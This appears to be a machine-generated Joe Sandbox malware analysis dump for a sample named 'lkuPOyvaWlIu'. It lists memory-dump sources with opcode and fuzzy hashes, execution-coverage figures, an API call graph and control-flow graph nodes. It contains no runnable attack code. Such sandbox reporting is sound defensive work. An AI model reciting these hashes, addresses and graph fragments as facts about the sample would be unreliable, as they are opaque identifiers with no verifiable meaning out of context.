                                                            • Source File: 00000009.00000002.1801397952.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_b9d000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2884a4d3eb6e4f056cc11a22481ab9616e40bb0529e8ab1b665508e0d6ce356a
                                                            • Instruction ID: 384374cc671490df6381691103b96bf2c19bf255e5dadef4e54f317f80ccb798
                                                            • Opcode Fuzzy Hash: 2884a4d3eb6e4f056cc11a22481ab9616e40bb0529e8ab1b665508e0d6ce356a
                                                            • Instruction Fuzzy Hash: 0201A2711093409AEB20AF2BC9C4767BFD8EF45324F18C4BAED594A297C2799844C6B1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f4d10ae460715a52a0bb4fab83865ce044285cac2e81a453d7cc04f90ee2274
                                                            • Instruction ID: eebb0feda16b813ca51422c59a1c88cef451a559b42593122f2e4413a5f14531
                                                            • Opcode Fuzzy Hash: 4f4d10ae460715a52a0bb4fab83865ce044285cac2e81a453d7cc04f90ee2274
                                                            • Instruction Fuzzy Hash: 4B0108B4A54218DFFB20DF55CC45FE8BBB8EB49300F1080D6A549A7281DB706A81CF10
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce20746da2642e9464cf34ecea9fe7844d5fb881686c1f05b68e50957452b4c5
                                                            • Instruction ID: 58900862be6f6b36f33ba36ef26ebc59539325098ebdde8ce779923363f3d490
                                                            • Opcode Fuzzy Hash: ce20746da2642e9464cf34ecea9fe7844d5fb881686c1f05b68e50957452b4c5
                                                            • Instruction Fuzzy Hash: 5CF0B4B0A0020D9FD740EF78D44669E7BF2EB84600F10C4B5D429DB350EB748902CF90
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1801397952.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_b9d000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d0ca025b39a898d40cf5deaf3249472040e9cf82605de4b4109e966de93ec1d
                                                            • Instruction ID: b265e2dd0dc913ee97a9b35c824f21a9af5ec66fc4652ac928f24fdd40c361db
                                                            • Opcode Fuzzy Hash: 9d0ca025b39a898d40cf5deaf3249472040e9cf82605de4b4109e966de93ec1d
                                                            • Instruction Fuzzy Hash: 50F062714053449EEB209B16C8C8BA6FFE8EB55724F18C45AED484A287C279AC44CAB1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75fd3bb272d8784546d4811c46e0de6edb9af2eea49bd7895dfc89d244bd5326
                                                            • Instruction ID: 50afe6ef1210598cbf795790716006d5deb9196516b2d97639fdbdc2bbdd8000
                                                            • Opcode Fuzzy Hash: 75fd3bb272d8784546d4811c46e0de6edb9af2eea49bd7895dfc89d244bd5326
                                                            • Instruction Fuzzy Hash: DA016DB1918259CFEB21DB64C844BE9BBB5EB0A310F2482EAD06D571E2C3315A86CF01
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63fc3ea928d3fe82ab6cc17d8a24ebb9ea6e765ce43be7c473f46130db4fc62f
                                                            • Instruction ID: f7c81d20f4573a391bb9a0fa1a8d52576183b88947b3b1da1dd4a3768ef1f320
                                                            • Opcode Fuzzy Hash: 63fc3ea928d3fe82ab6cc17d8a24ebb9ea6e765ce43be7c473f46130db4fc62f
                                                            • Instruction Fuzzy Hash: 13F017B4D0020E9FEB44DFA9C846AAEBBF4EB48700F0085A9D524E7201D7708641CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69b62ce1547492f83c4e219c65b2537fd25fa0da3695484c31eddd517387b5d7
                                                            • Instruction ID: 0f7ca815a5602233e3c735c119356bab1cc99ec12f4a48fa11283316a05bcf68
                                                            • Opcode Fuzzy Hash: 69b62ce1547492f83c4e219c65b2537fd25fa0da3695484c31eddd517387b5d7
                                                            • Instruction Fuzzy Hash: C2E022F720A2A46BD712126938140FBBF75BBC3A2130D00FFF0A69B2618A290D00C3E1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04c0f2fcf7790e735445bce5a20b91b1e503f4cf196332fc86113a6d08337998
                                                            • Instruction ID: 1529bebfdf00aef2ce06419f03a1209e5088ff1b64d88fcc6adba8c659bd611b
                                                            • Opcode Fuzzy Hash: 04c0f2fcf7790e735445bce5a20b91b1e503f4cf196332fc86113a6d08337998
                                                            • Instruction Fuzzy Hash: 2B01A4B5904268CFEB65DF55C944BEDBBB5FB09304F1080D9D019A2291D7355A8ACF00
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81c9277f1a61f9ef0b79ed104df91e2d349703749a29734278e3d4b5eb746fa1
                                                            • Instruction ID: 187505715b998e3e8526bc1a23ec89db07218b4da0a683cc8d4a058ec0b1fcf9
                                                            • Opcode Fuzzy Hash: 81c9277f1a61f9ef0b79ed104df91e2d349703749a29734278e3d4b5eb746fa1
                                                            • Instruction Fuzzy Hash: EE015F75A042289FDB20DB54CE94FE9BBB5AB49304F1480D9E509A7252C732AE85CF50
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 546e14f1b9511a4116caffc36b66cd25b6f0f8b46904c82b1ec1b530f10a00b1
                                                            • Instruction ID: 47bb31db9c203f038552ca842ef188f3ef93e9c6ee247bfd8f069a51d6b46be5
                                                            • Opcode Fuzzy Hash: 546e14f1b9511a4116caffc36b66cd25b6f0f8b46904c82b1ec1b530f10a00b1
                                                            • Instruction Fuzzy Hash: D2F0DAB0D1420E9FDB44DFA9C845AAEBBF4EB48310F1045A9D518E7201E7759541CFE1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f97ab47c60d6a04890791baa9c9b85f29022b54e69c6fc5b8365154e6425d4e
                                                            • Instruction ID: 3d23cd803fe7421aaa90f432bf5fc7f9be8dd07894a768955980353022fc39e2
                                                            • Opcode Fuzzy Hash: 5f97ab47c60d6a04890791baa9c9b85f29022b54e69c6fc5b8365154e6425d4e
                                                            • Instruction Fuzzy Hash: ACF0FEB9919258CFDB50DF20C9906E8BBF4AB1A314F5481DAD42DA7382D7319EC5CF40
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d781989e8815ca2e1993963bea001f9ef25367ac45bbd2d13d099e2525fa6a7
                                                            • Instruction ID: 80779f4f93b3f3d29618c010db8b9c925b0cafea16c2ba07439f2bea293ba5e6
                                                            • Opcode Fuzzy Hash: 3d781989e8815ca2e1993963bea001f9ef25367ac45bbd2d13d099e2525fa6a7
                                                            • Instruction Fuzzy Hash: 85E0C23E10928C9FD742EB649840CD77FAAEB8614170480D3E044C7022E315D929D772
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 91c06543f0eb6e30481b56e02aad0cd344b12a95086ddc3eacb3afd186a63641
                                                            • Instruction ID: 03c4831b9641684f9141b81a29ee7318630710a811bdc72205f99017767f1fb6
                                                            • Opcode Fuzzy Hash: 91c06543f0eb6e30481b56e02aad0cd344b12a95086ddc3eacb3afd186a63641
                                                            • Instruction Fuzzy Hash: 7FE0ED78914218CFCB50DF25C8546E8BBB5FB4E310F5096D9942EA7291DB319E86CF40
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6eb4057d445c5db570c48e235662ae274e40c98636455d894f1be6e83623d010
                                                            • Instruction ID: ff3501372db312bd98d83f4149185dc6a7a04e097b21d2821decd10d0719dfef
                                                            • Opcode Fuzzy Hash: 6eb4057d445c5db570c48e235662ae274e40c98636455d894f1be6e83623d010
                                                            • Instruction Fuzzy Hash: 7ED0A7F6705215678624169FB4085FBB7AEFFC5B1230C006EE42A933108F755C00C2E1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 367f2dbd06bcad3da3319de9781a91884f4e1b4363dd5c765d97722878c57204
                                                            • Instruction ID: 1d1f857fa4688791467a146a66b74ba31450406589e37eabb70fa86c5bb1969f
                                                            • Opcode Fuzzy Hash: 367f2dbd06bcad3da3319de9781a91884f4e1b4363dd5c765d97722878c57204
                                                            • Instruction Fuzzy Hash: E4E092B0D4020D9FE740EFA9C945A5EBBF4AB48600F1185A9D029EB261E7749A058F91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bff3f95931f651b5dc6dd4700d18853ff0b8b496fda7db9f04dc9f60287a63fd
                                                            • Instruction ID: e99ce0608b6996f065ca37d8df2cec24cdb2155fc786539d60da5f35856ee927
                                                            • Opcode Fuzzy Hash: bff3f95931f651b5dc6dd4700d18853ff0b8b496fda7db9f04dc9f60287a63fd
                                                            • Instruction Fuzzy Hash: B0E0ED38904218CFCB50DF25C8446D8BBB0FB49310F5086D9941D93391DB319E86CF40
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56033810d307b36c749f423b53e0f16be9cf1d99885dd3d82ac8e194ac31bdcc
                                                            • Instruction ID: 9f903a4778a10738f79df24b333e94f7961a36f610ffae43292dbf2c5d832340
                                                            • Opcode Fuzzy Hash: 56033810d307b36c749f423b53e0f16be9cf1d99885dd3d82ac8e194ac31bdcc
                                                            • Instruction Fuzzy Hash: 84E02BA024F2D54EC7A3D778A8446A53FA08B03120B1813C7F8D04F1E3CB150B02D392
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99e91c2bbf499ea3b0ff151a610b902bf5614136da61e868caa61592ce9d7521
                                                            • Instruction ID: 8cca0744770c7a618d086f152054512298abbf6dee8097e7b2e2cf42cb74b98e
                                                            • Opcode Fuzzy Hash: 99e91c2bbf499ea3b0ff151a610b902bf5614136da61e868caa61592ce9d7521
                                                            • Instruction Fuzzy Hash: 07D0C7B095510DDFDB84EFBC954575D7FB4D701201F2051A9A80453250EB715B54DB91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 863f97afb84157aef9551460f4dcae791ca2a3a9243d725793b9875d50e3e694
                                                            • Instruction ID: 2a9f1db8c93ef2d5e5544ee0ab0f7851656d6edc855d13fd803e6b96df946ff0
                                                            • Opcode Fuzzy Hash: 863f97afb84157aef9551460f4dcae791ca2a3a9243d725793b9875d50e3e694
                                                            • Instruction Fuzzy Hash: 32D0A9B090220CEBC329EAB491086997B78DB02214F1010ACE40412240EB728A80DB82
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9f9f4d1deaabd77ed3df2c9231d7cca0fb1c79ca4cbe23fe4910241906c6db2
                                                            • Instruction ID: 21774bd359540244f1494f6250b4163ec79e6a263e0e50df5a1658777e6f39d5
                                                            • Opcode Fuzzy Hash: b9f9f4d1deaabd77ed3df2c9231d7cca0fb1c79ca4cbe23fe4910241906c6db2
                                                            • Instruction Fuzzy Hash: D1D0C9B091620CDBD729EAB495456597B69DB02615F1011ADA40412250DB729A80DB96
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 47593b97b970f86409087a740b8b7e92e4e69810aef57d2e9a49390de73ac185
                                                            • Instruction ID: 62f055e2d84edc882577308b7d04b4e21646498fc649318540d19d28a98860f5
                                                            • Opcode Fuzzy Hash: 47593b97b970f86409087a740b8b7e92e4e69810aef57d2e9a49390de73ac185
                                                            • Instruction Fuzzy Hash: 26E0BD78904228CFDB50DF20C984BE8BBB5EB49318F0480DA840997256C731DA8ACF40
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1807713803.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_7b70000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b1c6a04f64d528f13462828ae4d396a0b11c5d51c850d0e049e742d4c775b87d
                                                            • Instruction ID: 5c89c956454b2f2e3043a53ae60c0bf0627fde9a9943a232eabb110d44880973
                                                            • Opcode Fuzzy Hash: b1c6a04f64d528f13462828ae4d396a0b11c5d51c850d0e049e742d4c775b87d
                                                            • Instruction Fuzzy Hash: 8EE04C74A04118DFDB55DF94DC91B9CFBB5FB4D304F14809D9919AB355C6329942CF40

                                                            Execution Graph

                                                            Execution Coverage:14.8%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:2.9%
                                                            Total number of Nodes:172
                                                            Total number of Limit Nodes:24
                                                            execution_graph 29321 6f29c70 29322 6f29c9d 29321->29322 29324 6f2bb7f 29322->29324 29326 6f29fa6 29322->29326 29327 6f29328 29322->29327 29325 6f29328 LdrInitializeThunk 29325->29326 29326->29324 29326->29325 29328 6f2933a 29327->29328 29329 6f2933f 29327->29329 29328->29326 29329->29328 29330 6f29a69 LdrInitializeThunk 29329->29330 29330->29328 29331 186d044 29332 186d05c 29331->29332 29333 186d0b6 29332->29333 29338 16e829c 29332->29338 29346 16e4854 29332->29346 29354 16e7537 29332->29354 29358 16e7548 29332->29358 29340 16e82a8 29338->29340 29339 16e8309 29343 16e8307 29339->29343 29372 16e497c 29339->29372 29340->29339 29342 16e82f9 29340->29342 29362 16e8420 29342->29362 29367 16e8430 29342->29367 29347 16e485f 29346->29347 29348 16e8309 29347->29348 29351 16e82f9 29347->29351 29349 16e8307 29348->29349 29350 16e497c CallWindowProcW 29348->29350 29350->29349 29352 16e8420 CallWindowProcW 29351->29352 29353 16e8430 CallWindowProcW 29351->29353 29352->29349 29353->29349 29355 16e756e 29354->29355 29356 16e4854 CallWindowProcW 29355->29356 29357 16e758f 29356->29357 29357->29333 29359 16e756e 29358->29359 29360 16e4854 CallWindowProcW 29359->29360 29361 16e758f 29360->29361 29361->29333 29364 16e8430 29362->29364 29363 16e84d0 29363->29343 29376 16e84e8 29364->29376 29379 16e84d9 29364->29379 29369 16e8444 29367->29369 29368 16e84d0 29368->29343 29370 16e84e8 CallWindowProcW 29369->29370 29371 16e84d9 CallWindowProcW 29369->29371 29370->29368 29371->29368 29373 16e4987 29372->29373 29374 16e9b6a CallWindowProcW 29373->29374 29375 16e9b19 29373->29375 29374->29375 29375->29343 29377 16e84f9 29376->29377 29382 16e9aa8 29376->29382 29377->29363 29380 16e84f9 29379->29380 29381 16e9aa8 CallWindowProcW 29379->29381 29380->29363 29381->29380 29383 16e9aad 29382->29383 29384 16e497c CallWindowProcW 29383->29384 29385 16e9aba 29384->29385 29385->29377 29386 16e4ee8 29388 16e4f19 29386->29388 29390 16e5019 29386->29390 29387 16e4f25 29388->29387 29395 16e5160 29388->29395 29399 16e5150 29388->29399 29389 16e4f65 29403 16e6460 29389->29403 29412 16e6450 29389->29412 29421 16e51a0 29395->29421 29431 16e51b0 29395->29431 29396 16e516a 29396->29389 29400 16e516a 29399->29400 29401 16e51a0 2 API calls 29399->29401 29402 16e51b0 2 API calls 29399->29402 29400->29389 29401->29400 29402->29400 29404 16e648b 29403->29404 29452 16e69b0 29404->29452 29405 16e650e 29406 16e653a 29405->29406 29407 16e4674 GetModuleHandleW 29405->29407 29406->29406 29408 16e657e 29407->29408 29409 16e7340 CreateWindowExW 29408->29409 29410 16e7330 CreateWindowExW 29408->29410 29409->29406 29410->29406 29413 16e6460 29412->29413 29418 16e69b0 GetModuleHandleW 29413->29418 29414 16e650e 29415 16e653a 29414->29415 29416 16e4674 GetModuleHandleW 29414->29416 29415->29415 29417 16e657e 29416->29417 29477 16e7340 29417->29477 29480 16e7330 29417->29480 29418->29414 29422 16e51b0 29421->29422 29425 16e51e4 29422->29425 29441 16e4674 29422->29441 29425->29396 29426 16e51dc 29426->29425 29427 16e53e8 GetModuleHandleW 29426->29427 29428 16e5415 29427->29428 29428->29396 29432 16e51c1 29431->29432 29434 16e51e4 29431->29434 29433 16e4674 GetModuleHandleW 29432->29433 29435 16e51cc 29433->29435 29434->29396 29435->29434 29439 16e5448 GetModuleHandleW 29435->29439 29440 16e5438 GetModuleHandleW 29435->29440 29436 16e51dc 29436->29434 29437 16e53e8 GetModuleHandleW 29436->29437 29438 16e5415 29437->29438 29438->29396 29439->29436 29440->29436 29442 16e53a0 GetModuleHandleW 29441->29442 29444 16e51cc 29442->29444 29444->29425 29445 16e5448 29444->29445 29448 16e5438 29444->29448 29446 16e4674 GetModuleHandleW 29445->29446 29447 16e545c 29446->29447 29447->29426 29449 16e5448 29448->29449 29450 16e4674 GetModuleHandleW 29449->29450 29451 16e545c 29450->29451 29451->29426 29453 16e69ed 29452->29453 29454 16e6a6e 29453->29454 29457 16e6b21 29453->29457 29467 16e6b30 29453->29467 29458 16e6b30 29457->29458 29459 16e4674 GetModuleHandleW 29458->29459 29460 16e6b69 29458->29460 29459->29460 29461 16e4674 GetModuleHandleW 29460->29461 29466 16e6d25 29460->29466 29462 16e6cab 29461->29462 29463 16e4674 GetModuleHandleW 29462->29463 29462->29466 29464 16e6cf9 29463->29464 29465 16e4674 GetModuleHandleW 29464->29465 29464->29466 29465->29466 29466->29454 29468 16e6b45 29467->29468 29469 16e4674 GetModuleHandleW 29468->29469 29470 16e6b69 29468->29470 29469->29470 29471 16e4674 GetModuleHandleW 29470->29471 29476 16e6d25 29470->29476 29472 16e6cab 29471->29472 29473 16e4674 GetModuleHandleW 29472->29473 29472->29476 29474 16e6cf9 29473->29474 29475 16e4674 GetModuleHandleW 29474->29475 29474->29476 29475->29476 29476->29454 29483 16e482c 29477->29483 29481 16e7375 29480->29481 29482 16e482c CreateWindowExW 29480->29482 29481->29415 29482->29481 29484 16e7390 CreateWindowExW 29483->29484 29486 16e74b4 29484->29486 29487 56ee018 29488 56ee024 29487->29488 29494 6f22968 29488->29494 29490 56ee61f 29495 6f2298a 29494->29495 29496 56ee0c3 29495->29496 29498 6f29328 LdrInitializeThunk 29495->29498 29508 6f29548 29495->29508 29514 6f2992c 29495->29514 29500 6f2fc68 29496->29500 29504 6f2fc5e 29496->29504 29498->29496 29501 6f2fc8a 29500->29501 29502 6f29548 2 API calls 29501->29502 29503 6f2fd3a 29501->29503 29502->29503 29503->29490 29505 6f2fc68 29504->29505 29506 6f29548 2 API calls 29505->29506 29507 6f2fd3a 29505->29507 29506->29507 29507->29490 29509 6f29579 29508->29509 29510 6f296d9 29509->29510 29511 6f29924 LdrInitializeThunk 29509->29511 29513 6f29328 LdrInitializeThunk 29509->29513 29510->29496 29511->29510 29513->29509 29518 6f297e3 29514->29518 29515 6f29924 LdrInitializeThunk 29517 6f29a81 29515->29517 29517->29496 29518->29515 29519 6f29328 LdrInitializeThunk 29518->29519 29519->29518 29520 16ebc98 29521 16ebfa0 29520->29521 29522 16ebcc0 29520->29522 29523 16ebcc9 29522->29523 29526 16eb164 29522->29526 29525 16ebcec 29527 16eb16f 29526->29527 29528 16ebfe3 29527->29528 29530 16eb180 29527->29530 29528->29525 29531 16ec018 OleInitialize 29530->29531 29532 16ec07c 29531->29532 29532->29528

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 791 56ec147-56ec158 792 56ec15a-56ec172 791->792 793 56ec184 791->793 797 56ec17b-56ec17e 792->797 798 56ec174-56ec179 792->798 794 56ec186-56ec18a 793->794 799 56ec18b-56ec199 797->799 800 56ec180-56ec182 797->800 798->794 802 56ec19b-56ec1a1 799->802 803 56ec211-56ec217 799->803 800->792 800->793 804 56ec219-56ec2ac call 56e41a0 call 56e3cc0 802->804 805 56ec1a3-56ec1c8 802->805 803->804 817 56ec2ae 804->817 818 56ec2b3-56ec2d4 call 56e5658 804->818 806 56ec1cf-56ec20a 805->806 807 56ec1ca 805->807 806->803 807->806 817->818 820 56ec2d9-56ec2e4 818->820 821 56ec2eb-56ec2ef 820->821 822 56ec2e6 820->822 823 56ec2f4-56ec2fb 821->823 824 56ec2f1-56ec2f2 821->824 822->821 826 56ec2fd 823->826 827 56ec302-56ec310 823->827 825 56ec313-56ec357 824->825 831 56ec3bd-56ec3d4 825->831 826->827 827->825 833 56ec359-56ec36f 831->833 834 56ec3d6-56ec3fb 831->834 838 56ec399 833->838 839 56ec371-56ec37d 833->839 841 56ec3fd-56ec412 834->841 842 56ec413 834->842 840 56ec39f-56ec3bc 838->840 843 56ec37f-56ec385 839->843 844 56ec387-56ec38d 839->844 840->831 841->842 845 56ec397 843->845 844->845 845->840
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                            • API String ID: 0-1487592376
                                                            • Opcode ID: c0721a0cbd273ee8ed8712e891e4ef5804521165274ff21e18b98ef454d0a486
                                                            • Instruction ID: 41b33786133847c19ff88ddd222190a40c122a69f8fb72da62071c4da26bdeb1
                                                            • Opcode Fuzzy Hash: c0721a0cbd273ee8ed8712e891e4ef5804521165274ff21e18b98ef454d0a486
                                                            • Instruction Fuzzy Hash: 88A1D775E01218DFEB14DFA9D984A9DBBF2BF49300F14806AE409AB365DB309D85CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 849 56ec46c-56ec46e 850 56ec475-56ec498 849->850 851 56ec470-56ec471 849->851 854 56ec49f-56ec4e7 850->854 855 56ec49a 850->855 852 56ec4e9-56ec57c call 56e41a0 call 56e3cc0 851->852 853 56ec473 851->853 866 56ec57e 852->866 867 56ec583-56ec5a4 call 56e5658 852->867 853->850 854->852 855->854 866->867 869 56ec5a9-56ec5b4 867->869 870 56ec5bb-56ec5bf 869->870 871 56ec5b6 869->871 872 56ec5c4-56ec5cb 870->872 873 56ec5c1-56ec5c2 870->873 871->870 875 56ec5cd 872->875 876 56ec5d2-56ec5e0 872->876 874 56ec5e3-56ec627 873->874 880 56ec68d-56ec6a4 874->880 875->876 876->874 882 56ec629-56ec63f 880->882 883 56ec6a6-56ec6cb 880->883 887 56ec669 882->887 888 56ec641-56ec64d 882->888 889 56ec6cd-56ec6e2 883->889 890 56ec6e3 883->890 893 56ec66f-56ec68c 887->893 891 56ec64f-56ec655 888->891 892 56ec657-56ec65d 888->892 889->890 894 56ec667 891->894 892->894 893->880 894->893
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4136398993.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_56e0000_lkuPOyvaWlIu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                            • API String ID: 0-1487592376
                                                            • Opcode ID: b8cf7bd2f83dffbba5d14043bc205de3c545b292e382e2f547b0c4ec19b23727
                                                            • Instruction ID: d2d5f5d2ce255ddafc850b732fc1f6403b2bb8af77cd03033a7e3acc4a44a2d9
                                                            • Opcode Fuzzy Hash: b8cf7bd2f83dffbba5d14043bc205de3c545b292e382e2f547b0c4ec19b23727
                                                            • Instruction Fuzzy Hash: EE91C674E01218CFDB14DFAAD844A9DBBF2FF89300F149069E419AB365DB305981CF50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
